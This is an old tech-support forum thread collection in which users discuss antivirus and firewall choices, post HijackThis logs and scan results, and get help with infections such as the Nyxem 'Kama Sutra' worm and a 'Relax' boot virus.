Just disable your norton hog & give AVG a try Flame.No regret within a year. Works fine...But ONE question: When I run complete scan sometimes, AVG finds adware ETC. Why it doesn't catch them on real time  and let them in? It found recently in my Java folder I downloaded from Java's website.Never had a problem with AVG itself although I have had to re-install it once when I made a mess of the system.Actually, I just started using AVG on another computer. I like it  

Flame Quote

Never had a problem with AVG itself although I have had to re-install it once when I made a mess of the system.

I had a similar situation. Although it got annoying sometimes, but I was generally well pleased with it.

I especially liked how it would pick up objects that others scanners couldn't find.
131.

Solve : SPAM contains personal/VERY familiar info. W?

Answer»

I often get SPAM that contains my first or last name, my city or state, and sometimes the subject contains a word/topic/name that I have recently looked at or emailed regarding.  E.g., I have a friend with a truly unique last name...trust me on that!...and it showed up a few days later in the hodge-podge random-word-generated subject line of a SPAM email in my box.  Assuming I behave safely day to day on the web (no chats, no file sharing), is there anything else I can do to root out possible problems?Programs to run?  I am NOT having any noticeable PC problems.  Oh, yeah, and I am behind a wireless router.

Currently running most current versions of:

SPYBOT S&D (free)
AdAware (free)
McAffee Virus Scan as provided by COMCAST

All updates current and I run one or all every couple of days without fail.  Thanks for the help.

KevinPost a Hijackthis log.Logfile of HijackThis v1.99.1
Scan saved at 3:54:57 AM, on 2/10/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
c:\PROGRA~1\mcafee.com\vso\OasClnt.exe
C:\WINDOWS\GWMDMMSG.exe
C:\Program Files\Microsoft IntelliPoint\point32.exe
C:\Program Files\HP\hpcoretech\hpcmpmgr.exe
C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
c:\program files\mcafee.com\vso\mcvsshld.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\system32\nvsvc32.exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\Musicmatch\Musicmatch Jukebox\mim.exe
C:\Program Files\Southwest Airlines\Ding\Ding.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\Linksys\WMP11 Config Utility\WMP11CFG.exe
C:\Program Files\Musicmatch\Musicmatch Jukebox\MMDiag.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\HP\Digital Imaging\bin\hpqgalry.exe
C:\PROGRA~1\McAfee.com\Agent\mcagent.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\Program Files\AdwareAlertHiJackThis\adwarealert.exe
C:\WINDOWS\system32\notepad.exe
C:\Documents and Settings\User-\Desktop\hijackthis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.comcast.net/home.html
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Google TOOLBAR Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [GWMDMMSG] GWMDMMSG.exe
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [MimBoot] C:\PROGRA~1\MUSICM~1\MUSICM~2\mimboot.exe
O4 - HKLM\..\Run: [UserFaultCheck] %systemroot%\system32\dumprep 0 -u
O4 - HKLM\..\Run: [HP Component Manager] "C:\Program Files\HP\hpcoretech\hpcmpmgr.exe"
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe
O4 - HKLM\..\Run: [REGSHAVE] C:\Program Files\REGSHAVE\REGSHAVE.EXE /AUTORUN
O4 - HKLM\..\Run: [MCUpdateExe] c:\PROGRA~1\mcafee.com\agent\mcupdate.exe
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [VSOCheckTask] "C:\PROGRA~1\McAfee.com\VSO\mcmnhdlr.exe" /checktask
O4 - HKLM\..\Run: [VirusScan Online] C:\Program Files\McAfee.com\VSO\mcvsshld.exe
O4 - HKLM\..\Run: [OASClnt] C:\Program Files\McAfee.com\VSO\oasclnt.exe
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [CleanUp] C:\PROGRA~1\McAfee.com\Shared\mcappins.exe /v=3 /cleanup
O4 - HKLM\..\Run: [AdwareAlert] C:\Program Files\AdwareAlertHiJackThis\adwarealert.Exe -boot
O4 - HKCU\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NVMCTRAY.DLL,NvTaskbarInit
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: DING!.lnk = C:\Program Files\Southwest Airlines\Ding\Ding.exe
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: HP Image Zone Fast Start.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqthb08.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE
O8 - Extra context menu item: &Google Search - res://c:\program files\google\GoogleToolbar1.dll/cmsearch.html
O8 - Extra context menu item: Backward Links - res://c:\program files\google\GoogleToolbar1.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://c:\program files\google\GoogleToolbar1.dll/cmcache.html
O8 - Extra context menu item: Similar Pages - res://c:\program files\google\GoogleToolbar1.dll/cmsimilar.html
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: cpcScanner -
O16 - DPF: {0000000A-0000-0010-8000-00AA00389B71} -
O16 - DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} (PCPitstop Utility) - http://support.gateway.com/support/profiler/PCPitStop.CAB
O16 - DPF: {11260943-421B-11D0-8EAC-0000C07D88CF} (iPIX ActiveX Control) - http://www.ipix.com/viewers/ipixx.cab
O16 - DPF: {26CBF141-7D0F-46E1-AA06-718958B6E4D2} - http://download.ebay.com/turbo_lister/US/install.cab
O16 - DPF: {33564D57-0000-0010-8000-00AA00389B71} -
O16 - DPF: {4A3CF76B-EC7A-405D-A67D-8DC6B52AB35B} -
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) -
Here's the rest of the log...with some overlap.  THX!!!!

O16 - DPF: {33564D57-0000-0010-8000-00AA00389B71} -
O16 - DPF: {4A3CF76B-EC7A-405D-A67D-8DC6B52AB35B} -
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) -
O16 - DPF: {7CDD074F-98A9-4DB4-9DD2-B6F26B5F30DA} -
O16 - DPF: {85D1F3B2-2A21-11D7-97B9-0010DC2A6243} (SecureLogin class) - http://secure2.comned.com/signuptemplates/securelogin-devel.cab
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} -
O16 - DPF: {AB86CE53-AC9F-449F-9399-D8ABCA09EC09} -
O16 - DPF: {B9F3009B-976B-41C4-A992-229DCCF3367C} (CoAxTrack Class) -
O16 - DPF: {BCC0FF27-31D9-4614-A68E-C18E1ADA4389} (DwnldGroupMgr Class) -
O16 - DPF: {CAFEEFAC-0014-0002-0005-ABCDEFFEDCBA} -
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) -
O16 - DPF: {EB387D2F-E27B-4D36-979E-847D1036C65D} (QDiagHUpdateObj Class) -
O16 - DPF: {FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6} (IWinAmpActiveX Class) -
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: McAfee WSC Integration (McDetect.exe) - McAfee, Inc - c:\program files\mcafee.com\agent\mcdetect.exe
O23 - Service: McAfee.com McShield (McShield) - McAfee Inc. - c:\PROGRA~1\mcafee.com\vso\mcshield.exe
O23 - Service: McAfee Task Scheduler (McTskshd.exe) - McAfee, Inc - c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
O23 - Service: McAfee SecurityCenter Update Manager (mcupdmgr.exe) - McAfee, Inc - C:\PROGRA~1\McAfee.com\Agent\mcupdmgr.exe
O23 - Service: NVIDIA Driver Helper Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: PictureTaker - LANovation - C:\WINDOWS\System32\PCTKRNT.SYS
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exeQuite a lot of garbage in there but no stand out problems.

Are you running a firewall?

Do you get incoming or outgoing data when you shouldn't?


Use Hijackthis & mark for removal the following.

O4 - HKLM\..\Run: [AdwareAlert] C:\Program Files\AdwareAlertHiJackThis\adwarealert.Exe -boot

The rest of the garbage is a matter for you.<<1)  Are you running a firewall?
2)  Do you get incoming or outgoing data when you shouldn't?
3)  Use Hijackthis & mark for removal the following.
O4 - HKLM\..\Run: [AdwareAlert].......>>
....................................... ....................................... ..............

1)  I'm behind a router and firewall is off.
2)  No data problems I can see.  Cursor seems to hop around to its own destination occasionally.  And those spooky SPAMS.  Noticed COMCAST's sign on window auto-minimizes upon opening and I have to EXPAND it every time...never before.  Nothing serious I guess.
3)  The Adware Alert I d'loaded from CNET site inadvertently trying to get Hijack This.

Thanks!!!  Anything else?

KLKev, analyse your logfile here,
http://www.hijackthis.de/index.php?langselect=english
remove the suspect things unless you know that you installed them for a reason.
You should get your friend with the unique name to check his computer too.
Ewido is a good starting point.<>

Ewido?  Ok, you got me   :-?http://www.ewido.net/en/Turning some sort of firewall on might help.  Chances are you don't want to turn on the Windows firewall, but a free firewall download would drastically improve your chances of non-infection.

-rock

132.

Solve : Is the Firewall protection in XP Pro SP2 any good??

Answer»

I was reading in a post on down in this section, an opinion that the SP2 Firewall in XP may still allow problems.

I have XP Pro on my built computer. I run Avast Anti VIRUS and rely only on the Firewall protection from the SP-2 pack.

Should I grab a different free one? Or actually buy one?

Thanks,Last I heard XP doesn't monitor outgoing traffic.
I use Sygate [highlight]Version 5.5 Build 2710[/highlight], it won't be available for much longer so grab it while you can.
http://207.33.111.31/spf/Also Zonelabs is still free for the personal version.  Like some others it can be set to only allow known programs outgoing access. This will block unauthorised access by any nasties you might get.  

However, a basic blocking firewall as with the native XP is probably ok if you are otherwise careful and have good virus and spyware monitoring. Depends on your preference to a degree.

The Simple Security Team
http://www.lulu.com/simplesecurityno its not man you can get the codes for it in like 30 seconds

R0SSNo, the SP2 firewall is not that great. It prevents some (limited) incoming programs, but no outgoing... Very weak... I use ZoneAlarm. Love it  

FlameI love using zonealarm myself to. I haven't had any troubles with my computer at all.Zonealarm is rubbish ,,,,,,,, Use Kerio personal firewallOK, just for the sake of asking. (because I'm not quite sure) What exactly is outgoing traffic. I'm guessing its info being sent from your computer that could be grabbed by someone you don't want having it?

And I'm assuming you don't want to run 2 firewalls as in don't want to run 2 anti virus programs?

As for current protection on my built XP Pro computer. I am running Avast Anti Virus, Ewido, Spybot and Spybot Resident, Ad-Aware, CCleaner, Microsoft Anti Spy, and the Microsoft Firewall in SP-2. I am a little concerned because I did have a worm (don't remember the particulars, name-wise) jump in on me a couple of weeks ago, but Avast was on it immediately. I thought I was locked down safe.

I am on top of all up-dates and try to be very carefull in my computing habits.

Thanks,

I am connected to the internet with an LAN?  My provider calls it a highspeed wireless connection.

Is one firewall better than the other for this type of internet connection?As the saying goes, TWO heads are better than one. Usually, two firewalls are better then one. Since I RECENTLY switched to Linux, I really don't have to worry about firewalls. But, I setup my parents computer on some proxies soStick with Zonealarm    The SP2 firewall is no good for what you need.

FlameGamers and SP2 HATE each other. They never get along...Well, I will probably d/l Zonealarm shortly.

I was not even aware that the Microsoft Firewall was not that good until I read it on here in a different post. Just before Christmas I was able to get a wireless connection.      Had been on dial up for 5 years. Live out in the country.

I am still learning about XP too (Well I'm still learning period about computers and eager to do so) . Had always had ME on my old computer (bought new by me 5 years ago).

Thanks for the replies,The best choice you ever made was switching from ME to XP.    Come back and see us if you have any more questions.

Flame Quote

The best choice you ever made was switching from ME to XP.    Come back and see us if you have any more questions.

Flame



I  may not post, but I am on here reading most everyday.

This is a great web-site.
133.

Solve : Virus Warning!?

Answer»

Got this in my email this MORNING

Quote

Note: forwarded message attached.
--------------------------------------------------------------------------------
Viruses found in the attached files.
The FILE eBook.PIF: Virus identified Worm/Generic.FX. The attachment was moved to the virus vault.

Checked by AVG Free Edition.
Version: 7.1.375 / Virus Database: 267.15.2/251 - Release Date: 04/02/2006

Good for AVG!Sounds like they're on top of things... I'll have to give AVG a SHOT sometime...

Flame
134.

Solve : Top 5 online virus scanners?

Answer»

Perhaps the best of all! This is a rating of the top 5 online virus scanners! We'll have some opinions on this one   http://antivirus.about.com/cs/softwarereviews/tp/aaonline.htm ... What do you think of the results? Hey, try them! They're free!  

FlameSeems LIKE a pretty good list if you ask me. Great link Flame.good tip... but they all didn't find a thing with me, is that good or bad? i MEAN finding NOTHING can be good that you have nothing, but finding nothing can ALSO be that they don't find the things you have :sDepends, you might want to have nothing, or you feel your software is better, then you are like, why should I care, mine is better, right?Usually one of the scanners will pick something up... Usually, unless you open bad E-mails, get pop-ups or vist weird websites, viruses don't come in.

Flame

135.

Solve : Kama sutra virus to hit Feb 3rd??

Answer»

Hello everyone.  Just heard over the news of this NASTY virus!  Any major worries :-?  Should all the major anti-virus software be updated for tlhis occurance?  Any advice from the computet Gods???
Thanks.Sorry about the mispelling, " Computer" not "Computet".  No disrespect intended :-/The [highlight]Nyxem-E[/highlight] Windows virus first emerged on 16 January and has been steadily racking up victims ever since. Nyxem-E is also known as the Blackmal, MyWife, [highlight]Kama Sutra[/highlight], Grew and CME-24 virus.

Helpfully, the virus reports every fresh infection back to an associated website which displays the total via a counter. Late last week the counter was reporting millions of infections, but detective work by security firm Lurhq found that many of these reports were bogus.

 SAMPLE SUBJECT LINES
Fw: Funny
Fw: Picturs
*Hot Movie*
Fw: SeX.mpg
Re: Sex Video
Miss Lebanon 2006
School girl fantasies gone bad  
However, Lurhq reported that more than 300,000 machines are known to have fallen victim to Nyxem-E.

Like many recent viruses, Nyxem tries to spread by making people open attachments on e-mail messages that are infected with the destructive code.

The subject lines and body text of the various messages Nyxem uses vary, but many falsely claim that pornographic videos and pictures are in the attachments.

On infected machines the virus raids address books to find e-mail addresses to send itself to.

The virus also tries to spread by searching for machines on the same local network as any computer it has compromised.

Unlike many recent viruses Nyxem is set to overwrite 11 different types of file on infected machines on the [highlight]third of every month[/highlight]. The LIST of files to be over-written includes the most widely used sorts of formats.

 NYXEM FILE TARGETS
DMP - Oracle files
DOC - WORD document
MDB - Microsoft Access
MDE - Microsoft Access/Office
PDF - Adobe Acrobat
PPS - PowerPoint slideshow
PPT - PowerPoint
PSD - Photoshop
RAR - Compressed archive
XLS - Excel spreadsheet
ZIP - Compressed file
Separately, the virus also tries to disable anti-virus software to stop it updating and can also disable the mouse and keyboard on infected machines.

Users were being urged to update anti-virus software and to scan their system to ensure they had not been caught out. Many anti-virus firms have also produced tools that help clean up infected SYSTEMS.

We'll be right, we all read our email in plain text & NEVER open attachments... do we Stay up-to-date on your Windows Updates. Also update your virus and Spyware definitions daily if possible.  Don't visit any strange sites. Don't open any strange E-mails as well. Avoid doing this, and you will (for the most part) be safe.

FlameThanks for the response.  Is it possible to get infected with a virus or worm if you don't open email attachments?  If something is not familiar to me then I delete it right away.
Thanks. Quote

 Is it possible to get infected with a virus or worm if you don't open email attachments?

Yes, plus there are the trojan, spyware and adware problems. You need a full supply of protection in your arsenal if you are using a Windows system. One program is NOT enough!
136.

Solve : Norton wont run, copy/paste quit, and so much more?

Answer»

About a week ago, Norton detected a virus on my computer and removed it. If I remember correctly it was called backdoor.formador. I am running windows 2000. I rebooted in safe mode, ran norton again, it detected the trojen and deleted it. I ALSO ran ewido, ad-aware and MICROSOFT spyware, just to be on the safe side. When I rebooted back into normal mode, the trouble began. Now, Norton antivirus will not open or run. I can no longer copy/paste no matter which method I use. I cannot open my add/remove program folder in the CONTROL panel. I have Real Rhapsody, that no longer works. These are just some of the things I have noticed. When I reboot my computer, it takes about 5 minutes to get going, about 3 times longer than it usually takes. Im at my wits end. if anyone can help me I would be so grateful. Just let me know what you need me to do. I do have Hijackthis if a log file is needed.

Thank you,
Brandy JonesIt won't hurt to put up the Hijackthis log.
Hint, start looking for that W2K disk  Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\Program Files\ewido\security suite\ewidoctrl.exe
C:\Program Files\Norton AntiVirus\IWP\NPFMntor.exe
C:\WINNT\system32\regsvc.exe
C:\WINNT\Explorer.EXE
C:\Program Files\Microsoft AntiSpyware\gcasServ.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\Program Files\PeerGuardian2\pg2.exe
C:\WINNT\system32\netdde.exe
C:\WINNT\system32\clipsrv.exe
C:\PROGRA~1\Rhapsody\rhaphlpr.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Documents and Settings\Nicole Pearce\Desktop\hijackthis[1]\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://securityresponse.symantec.com/avcenter/fix_homepage
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://red.clientapps.yahoo.com/customize/ie/defaults/sb/sbcydsl/*http://www.yahoo.com/search/ie.html
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = 127.0.0.1
O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O2 - BHO: NAV Helper - {A8F38D8D-E480-4D52-B7A2-731BB6995FDD} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: msdxmLC.dll,[email protected],&Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O3 - Toolbar: Norton AntiVirus - {C4069E3A-68F1-403E-B40E-20066696354B} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [NVCPLDAEMON] RUNDLL32.EXE C:\WINNT\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINNT\System32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [SSC_UserPrompt] "C:\Program Files\Common Files\Symantec Shared\Security Center\UsrPrmpt.exe"
O4 - HKLM\..\Run: [BJCFD] C:\Program Files\BroadJump\Client Foundation\CFD.exe
O4 - HKLM\..\Run: [gcasServ] "C:\Program Files\Microsoft AntiSpyware\gcasServ.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
O4 - HKCU\..\Run: [PeerGuardian] C:\Program Files\PeerGuardian2\pg2.exe
O4 - HKCU\..\Run: [Yahoo! Pager] C:\Program Files\Yahoo!\Messenger\ypager.exe -quiet
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - https://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\Common\yinsthelper.dll
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) - http://download.mcafee.com/molbin/shared/mcinsctl/en-us/4,0,0,90/mcinsctl.cab
O16 - DPF: {A922B6AB-3B87-11D3-B3C2-0008C7DA6CB9} (InetDownload Class) - https://media.pineconeresearch.com/ActiveX/downloadcontrol.cab
O16 - DPF: {BCC0FF27-31D9-4614-A68E-C18E1ADA4389} (DwnldGroupMgr Class) - http://download.mcafee.com/molbin/shared/mcgdmgr/en-us/1,0,0,23/mcgdmgr.cab
O16 - DPF: {D18F962A-3722-4B59-B08D-28BB9EB2281E} (PhotosCtrl Class) - http://photos.yahoo.com/ocx/us/yexplorer1_9us.cab
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
O23 - Service: ewido security suite control - ewido networks - C:\Program Files\ewido\security suite\ewidoctrl.exe
O23 - Service: Norton AntiVirus Auto-Protect Service (navapsvc) - Symantec Corporation - C:\Program Files\Norton AntiVirus\navapsvc.exe
O23 - Service: Norton AntiVirus Firewall Monitor Service (NPFMntor) - Symantec CorporationAnd here is the rest

O23 - Service: Norton AntiVirus Firewall Monitor Service (NPFMntor) - Symantec Corporation - C:\Program Files\Norton AntiVirus\IWP\NPFMntor.exe
O23 - Service: Norton Protection Center Service (NSCService) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\Security Console\NSCSRVCE.EXE
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINNT\System32\nvsvc32.exe
O23 - Service: Symantec AVScan (SAVScan) - Symantec Corporation - C:\Program Files\Norton AntiVirus\SAVScan.exe
O23 - Service: Symantec Network DRIVERS Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
O23 - Service: SPBBCSvc - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
O23 - Service: Symantec Core LC - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe

I dont have a W2K disk   funnygirl......  Your hijackthis log ...looks ok ........ I would seriously consider Fed's suggestion of looking for a win 2K cd and format and start again clean ...... Hopefully you should be able to save any info stored on the HD before the format .


dl65

137.

Solve : Computer sending out spam/email????

Answer»

Well I think I've either got a virus or some spyware on my computer.  For the LAST two WEEKS every time I check my EMAIL I GET a ton of undeliverable, delivery STATUS failure, and returned mail from all kinds of people that I never sent anything to (at least that I know about).  Is there any way to fix this?  I would hate to think that my email is being used to spam millions of people.  www.ccleaner.com
http://www.lavasoftusa.com/software/adaware/
http://www.safer-networking.org/en/index.html
http://www.microsoft.com/athome/security/spyware/software/default.mspx
http://free.grisoft.com/doc/1
http://www.ewido.net/en/

Online Virus Scan and Spyware Scan
http://www.pandasoftware.com/products/activescan.htm

Kudos to Fed.When you're clean everything will run faster too.have a read about zombies;

http://antivirus.about.com/od/whatisavirus/a/zombiepc.htmThanks, I ran several different programs and it cleaned up alot of s** ;Dt.  Hopefully it found everything.

138.

Solve : Relax?

Answer»

:-? Greetings People.Just a quick question. My Start up sequence has been infected and adjusted by the Relax VIRUS. When I start my computer It says Relax as all your files are now being deleted. This HAPPENS befor it goes into windows.It says press any key to ccontineuw. I press the return key a few times and windows starts up. I don,t know where this came from and I sure as *censored* don,t know how to get rid of it. Could you please give me some suggestions. P,S Everybody have a happy new year.It sounds like a hoax, does anyone else have access to your computer?
Does it happen in safe mode?
Run the scans.

ONLINE Virus Scan and Spyware Scan
http://www.pandasoftware.com/products/activescan.htm

Highly recommended second Online Malware Scan
http://www.ewido.net/en/

Both of them squady126...... It would appear it is indeed a virus.
http://www.virusportal.com/com/virusinfo/encyclopedia/overview.aspx?idvirus=39930

The good news is that the link Fed posted for you should find it.

dl65  Good one DL65 That's a creepy virus. And I have a LOT of important stuff, so I'd hate to see that when I am frustrated, because that's when I'm the most gullible. Good thing NAV and NIS works more than fine.

I'm sorry to hear that happened to you, squady126. A shame really. It makes me wonder why people even invent viruses.Greetings Peeps. Well there is good news and bad news on the virus front. Ran the panda scan
Incident                                                                        Status                        Location  e:Adware/Cydoor                                                            Not disinfected               C:\WINDOWS\SYSTEM\CD_CLINT.DLL                                                             Adware:Adware/BrilliantDigital                                                  Not disinfected               C:\WINDOWS\SYSTEM\BDEFDI.DLL                                                                 Adware:Adware/Cydoor                                                            Not disinfected               C:\WINDOWS\SYSTEM\CD_HTM.DLL                                                                spyware:spyware/commonname                                                      Not disinfected               C:\WINDOWS\SYSTEM\winnet.ini                                                                     Dialer:Dialer.Gen                                                               Not disinfected               C:\WINDOWS\SYSTEM\LiveParty_gb-uninstall.exe                                                                                                  Adware:Adware/BrilliantDigital                                                  Not disinfected               C:\WINDOWS\SYSTEM\bdedownloader.dll                                                        Adware:Adware/BrilliantDigital                                                  Not disinfected               C:\WINDOWS\SYSTEM\bdeinstall.exe                                                              Adware:Adware/WinTools                                                          Not disinfected               C:\WINDOWS\SYSTEM\grwinsthlp.exe                                                             Adware:Adware/BrilliantDigital                                                  Not disinfected               C:\WINDOWS\SYSTEM\bdeinsta25.dll                                                              Adware:Adware/BrilliantDigital                                                  Not disinfected               C:\WINDOWS\SYSTEM\bdeverify.exe                                                              Adware:Adware/BrilliantDigital                                                  Not disinfected               C:\WINDOWS\SYSTEM\bdeverify.dll                                                                Adware:Adware/BrilliantDigital                                                  Not disinfected               C:\WINDOWS\SYSTEM\BDEDATA2.DLL                                                            Dialer:Dialer.YC                                                                Not disinfected               C:\WINDOWS\INF\NSUPD9X.INF                                                                     Spyware/New.net                                                         Not disinfected               C:\WINDOWS\TEMP\freepeers-323.exe



Although Panda found this lot My problem still persists. I did go into the virus encyclopedea and found out some stuff about it thanks to dl65. Cheers mate.
I am running AVG free edition but this does not seem to pick up the little get.
Any more sugestions greatfully accepted.
P.S. couldn,t ewido as I am running windows 98 ,2000. It says it will only work on windows 2000 or above.
Once again many thanks for all those trying to solve my problem.
                                                                                                            Download Hijackthis, run a scan & post the log file here.
squady126....... You didnt really say if you got rid of the RELAX thing ........

I would also suggest D/L Spybot and Ad-aware SE ........
http://www.download.com/Spybot-Search-Destroy/3000-8022_4-10122137.html   ..... be sure and activate ..teatimer ........

